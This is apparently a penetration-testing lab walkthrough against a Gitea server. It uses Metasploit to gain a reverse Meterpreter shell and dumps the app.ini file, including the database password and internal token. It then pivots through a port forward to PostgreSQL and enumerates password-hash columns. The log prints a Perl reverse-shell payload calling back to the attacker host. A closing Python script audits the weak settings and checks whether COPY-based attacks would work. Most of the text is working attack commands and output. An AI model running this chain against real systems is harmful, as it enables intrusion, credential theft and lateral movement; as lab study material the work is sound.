manually create an account in gitea (demo_user:demo_user); the exploit module authenticates with it and relies on ALLOW_LOCALNETWORKS being enabled in the [migrations] section (scenario: the same network originally had a different git server, so migrating from it is desired and local-network migration sources have been allowed)

```sh
msf6 > use exploit/multi/http/gitea_git_fetch_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > set LHOST 192.168.56.20
LHOST => 192.168.56.20
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS 192.168.56.10
RHOSTS => 192.168.56.10
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/gitea_git_fetch_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/gitea_git_fetch_rce) > set username demo_user
username => demo_user
msf6 exploit(multi/http/gitea_git_fetch_rce) > set password demo_user
password => demo_user
msf6 exploit(multi/http/gitea_git_fetch_rce) > run
[*] Started reverse TCP handler on 192.168.56.20:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.56.20:8080/
[*] Using URL: http://192.168.56.20:8080/6usOy2
[*] Client 192.168.56.10 (curl/7.79.1) requested /6usOy2
[*] Sending payload to 192.168.56.10 (curl/7.79.1)
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 1 opened (192.168.56.20:4444 -> 192.168.56.10:48350) at 2025-05-19 07:35:34 -0400
[*] Command Stager progress - 100.00% done (112/112 bytes)
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : (Linux 5.15.0-135-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

in the shell transcript below, commands typed into the spawned shell are prefixed with `>` for readability; the shell itself prints no prompt

```sh
meterpreter > shell
Process 172 created.
Channel 1 created.
> env
USER=git
SHLVL=1
HOME=/data/git
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
LANG=C
PWD=/data/git/repositories/demo_user/wssbr3glpme5a.git
> ls /data
git  gitea  ssh
> ls /data/gitea
attachments  avatars  conf  indexers  jwt  log  queues  repo-archive  repo-avatars
> ls /data/gitea/conf
app.ini
> cat /data/gitea/conf/app.ini
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod

[repository]
ROOT = /data/git/repositories

[repository.local]
LOCAL_COPY_PATH = /data/gitea/tmp/local-repo

[repository.upload]
TEMP_PATH = /data/gitea/uploads

[server]
APP_DATA_PATH = /data/gitea
DOMAIN = localhost
SSH_DOMAIN = localhost
HTTP_PORT = 3000
ROOT_URL = https://gitea.vm.local/
DISABLE_SSH = false
SSH_PORT = 22
SSH_LISTEN_PORT = 22
LFS_START_SERVER = false
LFS_CONTENT_PATH = /data/git/lfs

[database]
PATH = /data/gitea/gitea.db
DB_TYPE = postgres
HOST = postgres:5432
NAME = gitea
USER = gitea
PASSWD = gitea
LOG_SQL = false
...

[log]
MODE = console
LEVEL = info
ROUTER = console
ROOT_PATH = /data/gitea/log

[security]
INSTALL_LOCK = true
SECRET_KEY =
REVERSE_PROXY_LIMIT = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3NDc2NTQxMTB9.qXWoxugJwfYRPl1mm8pQ_Z1dreWr2A2I4Aol5edV8o4

[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW = false

[migrations]
ALLOW_LOCALNETWORKS = true
```

for demonstration purposes, pivot to the database with the credentials from app.ini: inside the container `postgres` resolves to 172.18.0.1, so a port forward through the meterpreter session exposes it on the attacker's loopback

```sh
meterpreter > resolve postgres

Host resolutions
================

    Hostname  IP Address
    --------  ----------
    postgres  172.18.0.1

meterpreter > portfwd add -l 5432 -p 5432 -r 172.18.0.1
[*] Forward TCP relay created: (local) :5432 -> (remote) 172.18.0.1:5432
meterpreter > background
[*] Backgrounding session 1...
msf6 > use auxiliary/scanner/postgres/postgres_login
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/postgres/postgres_login) > set USERNAME gitea
USERNAME => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set PASSWORD gitea
PASSWORD => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set DATABASE gitea
DATABASE => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/postgres/postgres_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: gitea:gitea@gitea
[*] PostgreSQL session 2 opened (127.0.0.1:45027 -> 127.0.0.1:5432) at 2025-05-19 07:55:46 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
```

```sh
msf6 > use auxiliary/scanner/postgres/postgres_version
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_version) > set SESSION 2
SESSION => 2
msf6 auxiliary(scanner/postgres/postgres_version) > run
[*] 127.0.0.1:5432 Postgres - Version PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit (Post-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

```sh
msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
[*] Using configured payload cmd/unix/reverse_perl
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set SESSION 2
SESSION => 2
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.56.20
LHOST => 192.168.56.20
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.56.20:4444
[*] : - PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
[*] Exploiting...
[+] 127.0.0.1:5432 - gqBG2W1VfJT dropped successfully
[+] 127.0.0.1:5432 - gqBG2W1VfJT created successfully
[!] 127.0.0.1:5432 - Unable to execute query: COPY "gqBG2W1VfJT" FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.20:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''';
[-] Insufficient permissions, User must be superuser or in pg_read_server_files group
[-] Exploit Failed
```

most of the postgres exploit modules require a superuser, as shown: COPY FROM PROGRAM is allowed only to superusers or, from PostgreSQL 11 on, members of pg_execute_server_program, and the gitea role is neither (the module's message names pg_read_server_files, which is the role for COPY FROM a file; on 9.6 none of these default roles exist, so only a superuser would do). plain queries through postgres_sql still work, which is enough to enumerate the user table and its password hash columns

```sh
msf6 > use auxiliary/admin/postgres/postgres_sql
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > set SESSION 2
SESSION => 2
msf6 auxiliary(admin/postgres/postgres_sql) > set SQL 'SELECT version();'
SQL => SELECT version();
msf6 auxiliary(admin/postgres/postgres_sql) > run
Query Text: 'SELECT version();'
===============================

    version
    -------
    PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit

[*] Auxiliary module execution completed
msf6 auxiliary(admin/postgres/postgres_sql) > set SQL "SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';"
SQL => SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';
msf6 auxiliary(admin/postgres/postgres_sql) > run
Query Text: 'SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';'
==================================================================================================================================

    column_name                data_type
    -----------                ---------
    allow_create_organization  boolean
    allow_git_hook             boolean
    allow_import_local         boolean
    avatar                     character varying
    ...
    login_name                 character varying
    login_source               bigint
    login_type                 integer
    ...
    passwd                     character varying
    passwd_hash_algo           character varying
    ...
    salt                       character varying
    ...

[*] Auxiliary module execution completed
```

log:insecure:nmap
log:insecure:gitea_rce
log:insecure:gitea:shell
log:insecure:postgres_session
log:insecure:postgres_exploit_version
log:insecure:postgres_exploit_rce
log:insecure:postgres_exploit_sql
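added example, not code from this walkthrough, from Gitea or from Metasploit: a small Python triage script for what the foothold handed over. it parses a constructed excerpt of the app.ini dumped above (values as on the page) with configparser and flags the settings this chain depended on, ALLOW_LOCALNETWORKS, REVERSE_PROXY_TRUSTED_PROXIES = * and open registration, plus the secrets the file carries, then re-checks a corrected copy; and it holds the three queries worth running through postgres_sql before trying any COPY-based module, with a helper that turns their answers into which COPY forms the role can use (COPY FROM PROGRAM needs a superuser or, from PostgreSQL 11 on, pg_execute_server_program; on 9.6 that role does not exist). the severities, the `__root__` section name and the rolsuper/role rows for the lab database are my assumptions, chosen to match the failure shown above

```python
"""Triage helpers for what the foothold exposed: the Gitea app.ini and the database
role it hands out. Added example; not Gitea, Metasploit or the lab's own code."""
import configparser
import re

# Excerpt of the app.ini dumped from /data/gitea/conf above, reduced to the keys the
# audit reads (constructed for this example, values as on the page).
WEAK_INI = """\
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod

[database]
DB_TYPE = postgres
HOST = postgres:5432
USER = gitea
PASSWD = gitea

[security]
SECRET_KEY =
REVERSE_PROXY_LIMIT = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3NDc2NTQxMTB9.qXWoxugJwfYRPl1mm8pQ_Z1dreWr2A2I4Aol5edV8o4

[service]
DISABLE_REGISTRATION = false

[migrations]
ALLOW_LOCALNETWORKS = true
"""

# The same file with the three settings the chain leaned on corrected (constructed).
HARDENED_INI = (WEAK_INI
    .replace("ALLOW_LOCALNETWORKS = true", "ALLOW_LOCALNETWORKS = false")
    .replace("REVERSE_PROXY_TRUSTED_PROXIES = *", "REVERSE_PROXY_TRUSTED_PROXIES = 127.0.0.0/8")
    .replace("DISABLE_REGISTRATION = false", "DISABLE_REGISTRATION = true"))


def parse_app_ini(text):
    """Gitea (go-ini) allows keys before the first section header; configparser does
    not, so those keys are parked in a synthetic [__root__] section (my name)."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str  # keep Gitea's upper-case key names
    cp.read_string("[__root__]\n" + text)
    return cp


def _truthy(value):
    return value.strip().lower() in ("1", "true", "yes", "on")


def audit_app_ini(cp):
    """(severity, section, key, note) for each weak or sensitive setting found."""
    get = lambda s, k: cp.get(s, k, fallback=None)
    out = []
    v = get("migrations", "ALLOW_LOCALNETWORKS")
    if v is not None and _truthy(v):
        out.append(("high", "migrations", "ALLOW_LOCALNETWORKS",
                    "migration sources may be loopback/private addresses (the precondition above)"))
    v = get("security", "REVERSE_PROXY_TRUSTED_PROXIES")
    if v is not None and "*" in [p.strip() for p in v.split(",")]:
        out.append(("medium", "security", "REVERSE_PROXY_TRUSTED_PROXIES",
                    "any client may set X-Forwarded-For; list the proxy's address instead"))
    v = get("service", "DISABLE_REGISTRATION")
    if v is None or not _truthy(v):  # Gitea's default is open registration
        out.append(("medium", "service", "DISABLE_REGISTRATION",
                    "self-registration gives anyone the authenticated account the module needs"))
    for s, k in (("database", "PASSWD"), ("security", "INTERNAL_TOKEN"), ("security", "SECRET_KEY")):
        if get(s, k):  # non-empty value
            out.append(("info", s, k, "secret in app.ini; any file read (as the shell above) yields it"))
    return out


# Queries for auxiliary/admin/postgres/postgres_sql before trying COPY-based modules.
SQL_CHECKS = {
    "version": "SELECT version();",
    "superuser": "SELECT rolsuper FROM pg_roles WHERE rolname = current_user;",
    "roles": "SELECT rolname FROM pg_roles WHERE pg_has_role(current_user, oid, 'member');",
}
# Lab answers: version() is the page's output; the other two are constructed and
# consistent with the "Insufficient permissions" failure seen above.
LAB_VERSION = ("PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), "
               "compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit")
LAB_SUPERUSER, LAB_ROLES = "f", ["gitea"]


def pg_major(version_string):
    m = re.match(r"PostgreSQL\s+(\d+)", version_string)
    if not m:
        raise ValueError("not a PostgreSQL version() string")
    return int(m.group(1))  # 9 for the 9.x line, 11+ afterwards


def copy_capabilities(version_string, rolsuper, member_roles):
    """COPY with a file or PROGRAM needs superuser, or on PostgreSQL 11+ one of the
    default roles pg_read_server_files / pg_write_server_files /
    pg_execute_server_program; those roles do not exist before 11."""
    su = rolsuper in (True, "t", "true")
    major, roles = pg_major(version_string), set(member_roles)
    grant = lambda role: su or (major >= 11 and role in roles)
    return {"copy_from_file": grant("pg_read_server_files"),
            "copy_to_file": grant("pg_write_server_files"),
            "copy_from_program": grant("pg_execute_server_program")}


if __name__ == "__main__":
    for f in audit_app_ini(parse_app_ini(WEAK_INI)):
        print("%-6s [%s] %s: %s" % f)
    print(copy_capabilities(LAB_VERSION, LAB_SUPERUSER, LAB_ROLES))
```

against a live box, feed the real file with `audit_app_ini(parse_app_ini(open('/data/gitea/conf/app.ini').read()))`, paste the SQL_CHECKS strings into `set SQL` one at a time and hand the rows to copy_capabilities; if copy_from_program comes back False there is no point running postgres_copy_from_program_cmd_exec, and the session is worth more as a query channel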